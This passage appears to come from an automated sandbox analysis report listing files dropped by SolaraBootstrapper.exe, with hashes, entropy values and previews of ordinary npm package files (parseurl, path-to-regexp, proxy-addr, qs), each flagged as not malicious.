                                                  Preview:.(The MIT License)..Copyright (c) 2014 Jonathan Ong <me@jongleberry.com>.Copyright (c) 2014-2017 Douglas Christopher Wilson <doug@somethingdoug.com>..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):4094
                                                  Entropy (8bit):5.16312951835478
                                                  Encrypted:false
                                                  SSDEEP:96:aC815HgCi6b3vNti6ov8+cTG+RlG+mwFO+f5+lpcIC+9KP7Q:aCEpiK3vitv9OvbmwFDfclpcI39+7Q
                                                  MD5:59555697A7F93937AF7F76FE5326FA0D
                                                  SHA1:74B8E0A598BF2F69D3A40B3962266EEA9B4F3061
                                                  SHA-256:2D37D38021AA9EB04B9915958140A7E79350672555F60F4B271384DE1C0CFB81
                                                  SHA-512:4E3A6CEC7709B3018FBDFA20FDA99277BC609E06AD45A6292652227F9751AF1BDD1CE0D873C3A5D547E07DF4FE5D0270F05AC2F32895471ADDC1D570C50E30AA
                                                  Malicious:false
                                                  Preview:# parseurl..[![NPM Version][npm-version-image]][npm-url].[![NPM Downloads][npm-downloads-image]][npm-url].[![Node.js Version][node-image]][node-url].[![Build Status][travis-image]][travis-url].[![Test Coverage][coveralls-image]][coveralls-url]..Parse a URL with memoization...## Install..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```sh.$ npm install parseurl.```..## API..```js.var parseurl = require('parseurl').```..### parseurl(req)..Parse the URL of the given request object (looks at the `req.url` property).and return the result. The result is the same as `url.parse` in Node.js core..Calling this function multiple times on the same `req` where `req.url` does.not change will return a cached parsed object, rather than parsing again...### parseurl.original(req)..Parse the original URL of the
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2809
                                                  Entropy (8bit):4.756866369850906
                                                  Encrypted:false
                                                  SSDEEP:48:gXuWiipG3fbNRFSilsJLydtZER4iDL7gLydtCa7mPLnZ4BgdwevHwP8y/PpAOoij:s6ipobxSilsJLGiDL7gLB7PLnZ5we4Pf
                                                  MD5:3750351B6B1AA7F3E65D5499EA45006E
                                                  SHA1:7F8870A8A8D53BDA04D1C61037A348B5AE2F7DE8
                                                  SHA-256:811223D4A19492CCC642384DC84F0AF4AD935557DFE8F63750D7FFD673E40F17
                                                  SHA-512:F50D89B90850793E75919C19024A9F1FD27929628BC9C121D685F73C5472C756C8260F0101269550EE4708D370186472C01BA80A76E9220D1CE763F43725842E
                                                  Malicious:false
                                                  Preview:/*!. * parseurl. * Copyright(c) 2014 Jonathan Ong. * Copyright(c) 2014-2017 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module dependencies.. * @private. */..var url = require('url').var parse = url.parse.var Url = url.Url../**. * Module exports.. * @public. */..module.exports = parseurl.module.exports.original = originalurl../**. * Parse the `req` url with memoization.. *. * @param {ServerRequest} req. * @return {Object}. * @public. */..function parseurl (req) {. var url = req.url.. if (url === undefined) {. // URL is undefined. return undefined. }.. var parsed = req._parsedUrl.. if (fresh(url, parsed)) {. // Return cached URL parse. return parsed. }.. // Parse the URL. parsed = fastparse(url). parsed._raw = url.. return (req._parsedUrl = parsed).};../**. * Parse the `req` original url with fallback and memoization.. *. * @param {ServerRequest} req. * @return {Object}. * @public. */..function originalurl (req) {. var url = req.originalUr
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1180
                                                  Entropy (8bit):4.874642556018479
                                                  Encrypted:false
                                                  SSDEEP:24:vJ01wbxVWbeeNvfP6iUg1nZM1qW5cn6T+lxnyCy8ei:BUwdVWbe6fSiUg1nq15580+NH
                                                  MD5:5B1493BD775444F0994D0B1063DB1900
                                                  SHA1:646DC756FF16C464FCB63E17B2CD5EE4AD4F8B66
                                                  SHA-256:98C7B953C844CAC7C0BE2D5ABC6559C6FD3A6075FD159B04C0F1BF46145BFED2
                                                  SHA-512:5BE5BA8E172D288FD8F66DD3AFCFAE75D9F48D7FED3648BC34B4901FCC3F6ECCA59AB7D6A73FDA298DBAD33A372D74C083696E9169E6A6485E7BC4B166FAE318
                                                  Malicious:false
                                                  Preview:{. "name": "parseurl",. "description": "parse a url with memoization",. "version": "1.3.3",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "Jonathan Ong <me@jongleberry.com> (http://jongleberry.com)". ],. "repository": "pillarjs/parseurl",. "license": "MIT",. "devDependencies": {. "beautify-benchmark": "0.2.4",. "benchmark": "2.1.4",. "eslint": "5.16.0",. "eslint-config-standard": "12.0.0",. "eslint-plugin-import": "2.17.1",. "eslint-plugin-node": "7.0.1",. "eslint-plugin-promise": "4.1.1",. "eslint-plugin-standard": "4.0.0",. "fast-url-parser": "1.1.3",. "istanbul": "0.4.5",. "mocha": "6.1.3". },. "files": [. "LICENSE",. "HISTORY.md",. "README.md",. "index.js". ],. "engines": {. "node": ">= 0.8". },. "scripts": {. "bench": "node benchmark/index.js",. "lint": "eslint .",. "test": "mocha --check-leaks --bail --reporter spec test/",. "test-cov": "istanbul cover node_modules/mocha/
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):694
                                                  Entropy (8bit):4.570240121931512
                                                  Encrypted:false
                                                  SSDEEP:12:4u0C9Xevwydt179PAwo06dByRSB6D9oRLfQTYQ7ZIj:r5exd9ILyRlBVF0
                                                  MD5:9F6AE1A279C6994A01A2EC44294CB607
                                                  SHA1:63EF807649D9D3F6028A1D9A4B23CD3AF750AE2A
                                                  SHA-256:EE1E90F5F384416A9B98E8C7E99965A333980F0990F30220A8FC788063627D68
                                                  SHA-512:E5B8429F93E59F8E4A1A250F9CAF15294CD2D03CC8BD2F1962E6DBDD844EF7EF503E784091F318EB04D9FB3FF30F5F3301E0C9C452457E8458B6C59F071B5695
                                                  Malicious:false
                                                  Preview:0.1.7 / 2015-07-28.==================.. * Fixed regression with escaped round brackets and matching groups...0.1.6 / 2015-06-19.==================.. * Replace `index` feature by outputting all parameters, unnamed and named...0.1.5 / 2015-05-08.==================.. * Add an index property for position in match result...0.1.4 / 2015-03-05.==================.. * Add license information..0.1.3 / 2014-07-06.==================.. * Better array support. * Improved support for trailing slash in non-ending mode..0.1.0 / 2014-03-06.==================.. * add options.end..0.0.2 / 2013-02-10.==================.. * Update to match current express. * add .license property to component.json.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1103
                                                  Entropy (8bit):5.13317512688003
                                                  Encrypted:false
                                                  SSDEEP:24:bNtrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:bNtaJHlxE35QHOs5exm3ogF5n
                                                  MD5:44088BA57CB871A58ADD36CE51B8DE08
                                                  SHA1:3A7F886B632D2197676A40020D354E84B7860604
                                                  SHA-256:4EEB3271453A891DF609E5A9F4EE79A68307F730C13417A3BFEFFA604AC8CF25
                                                  SHA-512:6D8B9708BFA1F3CFA2B63F90152CB6F26960C2BA54FA11A16C13E1D5A3F85F4121516699025B6B759E051B276509B1D69510B644241434E6F8F81B3DFA5A8E63
                                                  Malicious:false
                                                  Preview:The MIT License (MIT)..Copyright (c) 2014 Blake Embrey (hello@blakeembrey.com)..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1102
                                                  Entropy (8bit):4.853431172373399
                                                  Encrypted:false
                                                  SSDEEP:24:daJFnVEbhberZlPA36log8BoSONxNiT7H13TaW7Mou8aTq:SVsbQ1ALcji/H13Tf7Mon6q
                                                  MD5:EC68CDEAF09933D8BF7A962C261AED81
                                                  SHA1:025D50A288FE95542257C776BF43EFCAA4BED4A0
                                                  SHA-256:9E280681BCB5D63E7E2E8A5FAA1FD1ED55573C0726268770F37EC267208FB31A
                                                  SHA-512:D8DA77B871B27B338070E9EE8783F0C0BF557AD8F0161CA8EDBB782D27BB5C20AA73B4484916B5A6BB942D3135548FF0006CB2D56B728B3BE927259B288964AB
                                                  Malicious:false
                                                  Preview:# Path-to-RegExp..Turn an Express-style path string such as `/user/:name` into a regular expression...**Note:** This is a legacy branch. You should upgrade to `1.x`...## Usage..```javascript.var pathToRegexp = require('path-to-regexp');.```..### pathToRegexp(path, keys, options).. - **path** A string in the express format, an array of such strings, or a regular expression. - **keys** An array to be populated with the keys present in the url. Once the function completes, this will be an array of strings.. - **options**. - **options.sensitive** Defaults to false, set this to true to make routes case sensitive. - **options.strict** Defaults to false, set this to true to make the trailing slash matter.. - **options.end** Defaults to true, set this to false to only match the prefix of the URL...```javascript.var keys = [];.var exp = pathToRegexp('/foo/:bar', keys);.//keys = ['bar'].//exp = /^\/foo\/(?:([^\/]+?))\/?$/i.```..## Live Demo..You can see a live demo of this library in use
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3328
                                                  Entropy (8bit):4.855981986788102
                                                  Encrypted:false
                                                  SSDEEP:96:YAmNU8fyZqHsEqHiehf5Uh/uU6p6cDA3wLTQ:YAp8fygHRKi8ehSYwLTQ
                                                  MD5:CB184302E8D26369E9C0392FA4C8D0CB
                                                  SHA1:D832B595EDE9EF5017A7C1D817689BA20AA1BB1F
                                                  SHA-256:C6FCA7C07D17E676C51896B785576A118CCFFA934959DDCEE7ED106D3F8D4D01
                                                  SHA-512:536437DD8C35D74748C7FE25D6D5427103CD0FFFA8B6EAAD2D786A9A4943191EBC1763BD4D104455280A5789C764079278D4EF33B1820E51AD8674965662A6C7
                                                  Malicious:false
                                                  Preview:/**. * Expose `pathtoRegexp`.. */..module.exports = pathtoRegexp;../**. * Match matching groups in a regular expression.. */.var MATCHING_GROUP_REGEXP = /\((?!\?)/g;../**. * Normalize the given path string,. * returning a regular expression.. *. * An empty array should be passed,. * which will contain the placeholder. * key names. For example "/user/:id" will. * then contain ["id"].. *. * @param {String|RegExp|Array} path. * @param {Array} keys. * @param {Object} options. * @return {RegExp}. * @api private. */..function pathtoRegexp(path, keys, options) {. options = options || {};. keys = keys || [];. var strict = options.strict;. var end = options.end !== false;. var flags = options.sensitive ? '' : 'i';. var extraOffset = 0;. var keysOffset = keys.length;. var i = 0;. var name = 0;. var m;.. if (path instanceof RegExp) {. while (m = MATCHING_GROUP_REGEXP.exec(path.source)) {. keys.push({. name: name++,. optional: false,. offset: m.index.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):554
                                                  Entropy (8bit):4.609052762628888
                                                  Encrypted:false
                                                  SSDEEP:12:bbADHavG+I1Cf/Ga4JV//GnOj42FsHbADPfCKgBbmPgynADtvo0QWCk:3AHavG+I1Cc/Vc2FqAffIEAt9QWv
                                                  MD5:19E58964462995E183C1CD8147A9B8A1
                                                  SHA1:EBFF0C6723FE9D9817CE3917D350B25E74148B15
                                                  SHA-256:86272F0B3CD4E2F23AFF36F63049A81FF6A10D364B74C6D9FF8CBBAC6F7A6638
                                                  SHA-512:778AFFB450D439C863510C8249A662A64AC1A7362CA047BB84B9D42643C45C2D17BA2E3D1A102E6D851D8F64503B0BA55D0AB6F5A7437440DF7A67F602F5A76A
                                                  Malicious:false
                                                  Preview:{. "name": "path-to-regexp",. "description": "Express style path to RegExp utility",. "version": "0.1.7",. "files": [. "index.js",. "LICENSE". ],. "scripts": {. "test": "istanbul cover _mocha -- -R spec". },. "keywords": [. "express",. "regexp". ],. "component": {. "scripts": {. "path-to-regexp": "index.js". }. },. "license": "MIT",. "repository": {. "type": "git",. "url": "https://github.com/component/path-to-regexp.git". },. "devDependencies": {. "mocha": "^1.17.1",. "istanbul": "^0.2.6". }.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2991
                                                  Entropy (8bit):4.71835894828316
                                                  Encrypted:false
                                                  SSDEEP:48:AD1WhutyHvAy8vJyVCwffUFpw6FwyPWYMK0TNb6uzNgnbN2A:AqhARQVmBHL5pN2A
                                                  MD5:31445AE0EB7987B5487CA79F48114DEF
                                                  SHA1:A943BD96906FF7AD1C64C0C323C538C44BFEBDCE
                                                  SHA-256:9BBB818F8492DDCA7BA1454D43EA2B3E956CCCD1D56AE4AB8B85D9560903B364
                                                  SHA-512:762A8F9216C82D1C8FA7C6FA75010E740AE7AA17DFC88D5ACD23D9F333CA4886293CA1A938937723C10E5647DD503B8D9C65BDBB6B7F72F4FF37B167D315C16E
                                                  Malicious:false
                                                  Preview:2.0.7 / 2021-05-31.==================.. * deps: forwarded@0.2.0. - Use `req.socket` over deprecated `req.connection`..2.0.6 / 2020-02-24.==================.. * deps: ipaddr.js@1.9.1..2.0.5 / 2019-04-16.==================.. * deps: ipaddr.js@1.9.0..2.0.4 / 2018-07-26.==================.. * deps: ipaddr.js@1.8.0..2.0.3 / 2018-02-19.==================.. * deps: ipaddr.js@1.6.0..2.0.2 / 2017-09-24.==================.. * deps: forwarded@~0.1.2. - perf: improve header parsing. - perf: reduce overhead when no `X-Forwarded-For` header..2.0.1 / 2017-09-10.==================.. * deps: forwarded@~0.1.1. - Fix trimming leading / trailing OWS. - perf: hoist regular expression. * deps: ipaddr.js@1.5.2..2.0.0 / 2017-08-08.==================.. * Drop support for Node.js below 0.10..1.1.5 / 2017-07-25.==================.. * Fix array argument being altered. * deps: ipaddr.js@1.4.0..1.1.4 / 2017-03-24.==================.. * deps: ipaddr.js@1.3.0..1.1.3 / 2017-01-14.===========
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1094
                                                  Entropy (8bit):5.1284116326456815
                                                  Encrypted:false
                                                  SSDEEP:24:PiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:PiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:6E8686B7B13DD7AC8733645A81842C4A
                                                  SHA1:B058A139CB239C658C8F1F841A475A50818B5F73
                                                  SHA-256:A7996721249A136FBCFC1C201BCB5F414F38A701D4A24F28ABE65E16CFCCE813
                                                  SHA-512:1CACD9111B9EB27A0FD326DD19D61BDF767E443EE1DD09D983AF81199ECDA0D7CF047FBD18B900C7D773972B1278D5D3C19FA753591333C04C27DDAC71AF6422
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2014-2016 Douglas Christopher Wilson..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,.TORT OR OTHERWISE, ARISING
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):4131
                                                  Entropy (8bit):5.125035909270746
                                                  Encrypted:false
                                                  SSDEEP:96:6Ccg15WSK7R323Q7mYPSP0zHmf+fKH+6p+ZGeYOYgWxrbYplDGboKRksR:6Cl64+6p+oPJYEasR
                                                  MD5:4BC9AA46F3AFB34D0AB0C82CF244A21B
                                                  SHA1:0AC53E3EF297C7D1BDCADA2A2D00AD68A3696B9B
                                                  SHA-256:409E75C7C493C60AEB91D36D4C0BBDF028B5FFC93FBE5372C1B9DBD711804E05
                                                  SHA-512:4D8BD05213427C77BE7CF9707C69291A71353470150EC4A6349529EF80E68C671A7C2CC38B450F73DE11D031D8E51B56C26CD2CBD95200441DA52649759691CB
                                                  Malicious:false
                                                  Preview:# proxy-addr..[![NPM Version][npm-version-image]][npm-url].[![NPM Downloads][npm-downloads-image]][npm-url].[![Node.js Version][node-image]][node-url].[![Build Status][ci-image]][ci-url].[![Test Coverage][coveralls-image]][coveralls-url]..Determine address of proxied request..## Install..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```sh.$ npm install proxy-addr.```..## API..```js.var proxyaddr = require('proxy-addr').```..### proxyaddr(req, trust)..Return the address of the request, using the given `trust` parameter...The `trust` argument is a function that returns `true` if you trust.the address, `false` if you don't. The closest untrusted address is.returned...```js.proxyaddr(req, function (addr) { return addr === '127.0.0.1' }).proxyaddr(req, function (addr, i) { return i < 1 }).```..The
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):6000
                                                  Entropy (8bit):4.8574988059761495
                                                  Encrypted:false
                                                  SSDEEP:96:voP1XR7qGGNUNB2iAJsauyKhQANc/EXx+4aRNIov07YNJzti1+CunHQQ/b:voP1XJqxUNUuauyKNNC4uVJn3nH3b
                                                  MD5:0EC33EA2CCB3A107C666A0B311F0E28E
                                                  SHA1:B03A544515E5FF12276828EEB08AD773661513C8
                                                  SHA-256:C586F959F09961EDC6E261D9404455FCE40998A221F71D44833BB4B12796C33C
                                                  SHA-512:4E494C7CC69A0F41FAD896DF84AE90E8A3AA58C7229E35507C281C4D57D238EFA01801AB076E2594B4016FEEEA161F60913709D11C94FEFE3E1C852267BB2413
                                                  Malicious:false
                                                  Preview:/*!. * proxy-addr. * Copyright(c) 2014-2016 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module exports.. * @public. */..module.exports = proxyaddr.module.exports.all = alladdrs.module.exports.compile = compile../**. * Module dependencies.. * @private. */..var forwarded = require('forwarded').var ipaddr = require('ipaddr.js')../**. * Variables.. * @private. */..var DIGIT_REGEXP = /^[0-9]+$/.var isip = ipaddr.isValid.var parseip = ipaddr.parse../**. * Pre-defined IP ranges.. * @private. */..var IP_RANGES = {. linklocal: ['169.254.0.0/16', 'fe80::/10'],. loopback: ['127.0.0.1/8', '::1/128'],. uniquelocal: ['10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16', 'fc00::/7'].}../**. * Get all addresses in the request, optionally stopping. * at the first untrusted.. *. * @param {Object} request. * @param {Function|Array|String} [trust]. * @public. */..function alladdrs (req, trust) {. // get addresses. var addrs = forwarded(req).. if (!trust) {. // Return all addre
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1183
                                                  Entropy (8bit):4.7851179485889626
                                                  Encrypted:false
                                                  SSDEEP:24:lHdWWn1JOXJj0W65QuvgCdqIZCLlWecE6T+lwZKLt:l9W6JmAt5QuoCdqIQUex0+qo5
                                                  MD5:9B004D1140B24F5AE3F21FCDBA8951FC
                                                  SHA1:A04C60D6B2441D6E2A6EBDDCAB75AA6EFC2D1D9C
                                                  SHA-256:E490A79F8058CBB7C0E9FD3B9977013102B5CBD8D232259B93BB2EBF85834A51
                                                  SHA-512:34B9FE96A5251B2A7137FCE47FBF4EC47FB6D7EECF1662BB34862950A95AF007ADA3F07AEBFB29104DD1FF38ED077A6809B76EC912DE2F84EB32E5DD80C75284
                                                  Malicious:false
                                                  Preview:{. "name": "proxy-addr",. "description": "Determine address of proxied request",. "version": "2.0.7",. "author": "Douglas Christopher Wilson <doug@somethingdoug.com>",. "license": "MIT",. "keywords": [. "ip",. "proxy",. "x-forwarded-for". ],. "repository": "jshttp/proxy-addr",. "dependencies": {. "forwarded": "0.2.0",. "ipaddr.js": "1.9.1". },. "devDependencies": {. "benchmark": "2.1.4",. "beautify-benchmark": "0.2.4",. "deep-equal": "1.0.1",. "eslint": "7.26.0",. "eslint-config-standard": "14.1.1",. "eslint-plugin-import": "2.23.4",. "eslint-plugin-markdown": "2.2.0",. "eslint-plugin-node": "11.1.0",. "eslint-plugin-promise": "4.3.1",. "eslint-plugin-standard": "4.1.0",. "mocha": "8.4.0",. "nyc": "15.1.0". },. "files": [. "LICENSE",. "HISTORY.md",. "README.md",. "index.js". ],. "engines": {. "node": ">= 0.10". },. "scripts": {. "bench": "node benchmark/index.js",. "lint": "eslint .",. "test": "
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):569
                                                  Entropy (8bit):4.800574337450001
                                                  Encrypted:false
                                                  SSDEEP:12:UvEsKHqPYdOZwq+TmYJsR54G4mmKlS2LW1JaMHUUQP:UMJH45ZwLTM74hm7l2q6UU4
                                                  MD5:DA08D1EBFD87C9C4F5C059CC79339F74
                                                  SHA1:A9E675FF2B7A222335A84856CD39C75FB7BC6E39
                                                  SHA-256:E88EB6D645D1E89AC4948B93DF420C7798A6A5EA51E4D021246CCACD6B43C639
                                                  SHA-512:4FFE06651022C45B693398E21677B5F993B9598B22C0DAB2D7AF884AAED907A6BC204535462E4063F67F4969466B63849B4E25007F6928E3A7046056468BD760
                                                  Malicious:false
                                                  Preview:root = true..[*].indent_style = space.indent_size = 4.end_of_line = lf.charset = utf-8.trim_trailing_whitespace = true.insert_final_newline = true.max_line_length = 160.quote_type = single..[test/*].max_line_length = off..[LICENSE.md].indent_size = off..[*.md].max_line_length = off..[*.json].max_line_length = off..[Makefile].max_line_length = off..[CHANGELOG.md].indent_style = space.indent_size = 2..[LICENSE].indent_size = 2.max_line_length = off..[coverage/**/*].indent_size = off.indent_style = off.indent = off.max_line_length = off..[.nycrc].indent_style = tab.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1025
                                                  Entropy (8bit):4.137277213207899
                                                  Encrypted:false
                                                  SSDEEP:24:24syhU0GEGKMu/GH6dFZrmhZonKygFjB6TNi:1syHIJadFJGjcTNi
                                                  MD5:37875CFBE508BCC248856FC88F1F669C
                                                  SHA1:D34602136E9C3D76ADD80EC2BD320C31C33FFEF2
                                                  SHA-256:4563BE7FB02331482AE9B170733772A83F0FB0D18BDC0E3DEB1ADB4E1CC04BF5
                                                  SHA-512:049400D471FD901B7A23C81F4A2DCE4A4175A83800E0B45FD5C1D47C9F476BE1F0404CE15B7039C39563EF6C223D28EB4D51E2A234E1306A9B05901468528E70
                                                  Malicious:false
                                                  Preview:{. "root": true,.. "extends": "@ljharb",.. "ignorePatterns": [. "dist/",. ],.. "rules": {. "complexity": 0,. "consistent-return": 1,. "func-name-matching": 0,. "id-length": [2, { "min": 1, "max": 25, "properties": "never" }],. "indent": [2, 4],. "max-lines-per-function": [2, { "max": 150 }],. "max-params": [2, 16],. "max-statements": [2, 53],. "multiline-comment-style": 0,. "no-continue": 1,. "no-magic-numbers": 0,. "no-restricted-syntax": [2, "BreakStatement", "DebuggerStatement", "ForInStatement", "LabeledStatement", "WithStatement"],. },.. "overrides": [. {. "files": "test/**",. "rules": {. "function-paren-newline": 0,. "max-lines-per-function": 0,. "max-statements": 0,. "no-buffer-constructor": 0,. "no-extend-native": 0,. "no-throw-literal": 0,.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):548
                                                  Entropy (8bit):4.608901185947105
                                                  Encrypted:false
                                                  SSDEEP:12:OjjcfQWARgMqJugMJPH0FggMfFlgM01bZBgMoGbQjgMy9gMLzgMT:qoQWAg0g+H0mgcFlg7g1GegJ9gEzgs
                                                  MD5:9103C1348CBED423A71D3E82348B9095
                                                  SHA1:5968075E1CBE9F11D62B700FABA1C9B44291BD7E
                                                  SHA-256:367B5D545D7A66684895EE7EFD987130E83018491A7B2F72F25C0B062157AD90
                                                  SHA-512:B573BD8D14921783570A8674F1CD9BFC8403081605367947A63A8369B206D80A423366B323825DDC36E07938BD3E5F710C4531A45206D331F631AB32BCB6EE59
                                                  Malicious:false
                                                  Preview:# These are supported funding model platforms..github: [ljharb].patreon: # Replace with a single Patreon username.open_collective: # Replace with a single Open Collective username.ko_fi: # Replace with a single Ko-fi username.tidelift: npm/qs.community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry.liberapay: # Replace with a single Liberapay username.issuehunt: # Replace with a single IssueHunt username.otechie: # Replace with a single Otechie username.custom: # Replace with a single custom sponsorship URL.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):216
                                                  Entropy (8bit):4.799229660371475
                                                  Encrypted:false
                                                  SSDEEP:6:Kw9OfyFdRaB9yq2TpR6S8U7XfUGUiMIOJy:5O6FTaB9WTpR65U7cAMjJy
                                                  MD5:2C4AA96D1D53687375D35FB7F3F7AE6E
                                                  SHA1:310D7C4DDE09BADCAA10BF85F386ED4B17F17745
                                                  SHA-256:7E1E3A52DF079FC764989D75B3AAF5228228C841978E0C9201D1F394C1FD2655
                                                  SHA-512:C1158D7EE0B3C8668BD2370BF8349B3E1DFABC31548AAA0B16493C525FCFD4079254EC07BFBB4D6FE1ECB7801679A3FC9318428A7953B3C261C87337053D99B6
                                                  Malicious:false
                                                  Preview:{.."all": true,.."check-coverage": false,.."reporter": ["text-summary", "text", "html", "json"],.."lines": 86,.."statements": 85.93,.."functions": 82.43,.."branches": 76.06,.."exclude": [..."coverage",..."dist"..].}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:Unicode text, UTF-8 text
                                                  Category:dropped
                                                  Size (bytes):29661
                                                  Entropy (8bit):5.199404663647947
                                                  Encrypted:false
                                                  SSDEEP:384:zwkCw7nk3hretjrywBFwcVZwDvRKfb/+7cMsIBt9xvY5P0i:z9yhujewBFP/4vRKzKcfA20i
                                                  MD5:2E2BD05CE068E71A67D68E95FBFABE03
                                                  SHA1:E7FD1D87B00DA8CB88AC75E162A0C01049B242E0
                                                  SHA-256:13D5E628389526DABD365252A088D769E03AFA3919CCDBC0D7627623FD211617
                                                  SHA-512:1B032FB8A0A039A49D5B690F2FEE50C0F5C46C218BE09F704F557A8BFC3CBCCE92556F1BE8BF54BB527C6ECD5AC7BA7E5EA8C0D5584205742310B8FE37FF71A8
                                                  Malicious:false
                                                  Preview:## **6.11.0.- [New] [Fix] `stringify`: revert 0e903c0; add `commaRoundTrip` option (#442).- [readme] fix version badge..## **6.10.5**.- [Fix] `stringify`: with `arrayFormat: comma`, properly include an explicit `[]` on a single-item array (#434)..## **6.10.4**.- [Fix] `stringify`: with `arrayFormat: comma`, include an explicit `[]` on a single-item array (#441).- [meta] use `npmignore` to autogenerate an npmignore file.- [Dev Deps] update `eslint`, `@ljharb/eslint-config`, `aud`, `has-symbol`, `object-inspect`, `tape`..## **6.10.3**.- [Fix] `parse`: ignore `__proto__` keys (#428).- [Robustness] `stringify`: avoid relying on a global `undefined` (#427).- [actions] reuse common workflows.- [Dev Deps] update `eslint`, `@ljharb/eslint-config`, `object-inspect`, `tape`..## **6.10.2**.- [Fix] `stringify`: actually fix cyclic references (#426).- [Fix] `stringify`: avoid encoding arrayformat comma when `encodeValuesOnly = true` (#424).- [readme] remove travis badge; add github actions/codecov
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1600
